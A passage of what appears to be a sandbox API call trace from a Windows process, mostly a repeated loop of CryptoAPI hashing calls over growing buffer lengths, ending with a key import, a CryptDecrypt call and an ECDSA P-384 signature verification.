	[0217.137] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27376d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27376d8, pdwDataLen=0x1284a8) returned 1
	[0217.137] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.137] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.137] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.138] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.138] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0217.138] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737700
	[0217.138] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737700, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737700, pdwDataLen=0x1284a8) returned 1
	[0217.138] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.138] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.138] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.138] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.138] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0217.138] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737728
	[0217.138] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737728, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737728, pdwDataLen=0x1284a8) returned 1
	[0217.138] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.138] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.138] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.139] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.139] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0217.139] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737750
	[0217.139] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737750, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737750, pdwDataLen=0x1284a8) returned 1
	[0217.139] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.139] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.139] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.139] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.139] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0217.139] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737778
	[0217.140] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737778, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737778, pdwDataLen=0x1284a8) returned 1
	[0217.140] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.140] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.140] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.140] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.140] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0217.140] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27377a0
	[0217.140] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27377a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27377a0, pdwDataLen=0x1284a8) returned 1
	[0217.140] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.140] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.140] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.140] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.140] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0217.141] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27377c8
	[0217.141] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27377c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27377c8, pdwDataLen=0x1284a8) returned 1
	[0217.141] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.141] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.141] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.141] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.141] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0217.141] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27377f0
	[0217.141] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27377f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27377f0, pdwDataLen=0x1284a8) returned 1
	[0217.141] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.141] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.141] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.141] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.141] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0217.142] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737818
	[0217.142] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737818, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737818, pdwDataLen=0x1284a8) returned 1
	[0217.142] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.142] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.142] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.142] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.142] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0217.142] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737840
	[0217.142] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737840, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737840, pdwDataLen=0x1284a8) returned 1
	[0217.142] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.142] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.142] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.142] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.142] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0217.143] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737868
	[0217.143] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737868, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737868, pdwDataLen=0x1284a8) returned 1
	[0217.143] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.143] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.143] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.143] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.143] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0217.143] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737890
	[0217.143] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737890, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737890, pdwDataLen=0x1284a8) returned 1
	[0217.143] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.143] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.143] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.143] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.143] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0217.144] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27378b8
	[0217.144] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27378b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27378b8, pdwDataLen=0x1284a8) returned 1
	[0217.144] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.144] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.144] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.144] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.144] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0217.144] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27378e0
	[0217.144] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27378e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27378e0, pdwDataLen=0x1284a8) returned 1
	[0217.144] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.144] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.144] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.144] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.144] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0217.145] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737908
	[0217.145] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737908, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737908, pdwDataLen=0x1284a8) returned 1
	[0217.145] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.145] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.145] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.145] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.145] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0217.145] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737930
	[0217.145] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737930, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737930, pdwDataLen=0x1284a8) returned 1
	[0217.145] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.145] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.145] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.145] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.146] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0217.146] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737958
	[0217.146] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737958, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737958, pdwDataLen=0x1284a8) returned 1
	[0217.146] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.146] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.146] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.146] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.146] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0217.146] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737980
	[0217.146] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737980, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737980, pdwDataLen=0x1284a8) returned 1
	[0217.146] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.146] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.146] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.146] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.147] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0217.147] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27379a8
	[0217.147] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27379a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27379a8, pdwDataLen=0x1284a8) returned 1
	[0217.147] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.147] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.147] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.147] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.147] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0217.147] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27379d0
	[0217.147] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27379d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27379d0, pdwDataLen=0x1284a8) returned 1
	[0217.147] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.147] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.147] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.147] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.148] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0217.148] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27379f8
	[0217.148] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27379f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27379f8, pdwDataLen=0x1284a8) returned 1
	[0217.148] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.148] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.148] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.148] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.148] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0217.148] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.148] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737a20, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737a20, pdwDataLen=0x1284a8) returned 1
	[0217.148] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.148] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.148] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.149] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.149] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0217.149] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.149] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737a48, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737a48, pdwDataLen=0x1284a8) returned 1
	[0217.149] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.149] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.149] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.149] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.149] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0217.149] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.149] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737a70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737a70, pdwDataLen=0x1284a8) returned 1
	[0217.149] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.149] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.150] CryptImportKey (in: hProv=0x2259f0, pbData=0x12849c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1284dc | out: phKey=0x1284dc*=0x22b6ac0) returned 1
	[0217.150] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x4, pbData=0x1284c8*=0x1, dwFlags=0x0) returned 1
	[0217.150] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x1, pbData=0x2737b88, dwFlags=0x0) returned 1
	[0217.150] CryptDecrypt (in: hKey=0x22b6ac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x26b58c8, pdwDataLen=0x1284d0 | out: pbData=0x26b58c8, pdwDataLen=0x1284d0) returned 1
	[0217.151] CryptDestroyKey (hKey=0x22b6ac0) returned 1
	[0217.151] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.151] GetVersion () returned 0x1db10106
	[0217.151] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1284dc, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1284dc) returned 0x0
	[0217.151] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1284e4, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1284e4) returned 0x0
	[0217.153] BCryptGetProperty (in: hObject=0x2299db0, pszProperty="SignatureLength", pbOutput=0x1284fc, cbOutput=0x4, pcbResult=0x1284d4, dwFlags=0x0 | out: pbOutput=0x1284fc, pcbResult=0x1284d4) returned 0x0
	[0217.153] BCryptVerifySignature (hKey=0x2299db0, pPaddingInfo=0x0, pbHash=0x22a5f18, cbHash=0x30, pbSignature=0x26b5bbb, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0217.156] BCryptDestroyKey (in: hKey=0x2299db0 | out: hKey=0x2299db0) returned 0x0
	[0217.156] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
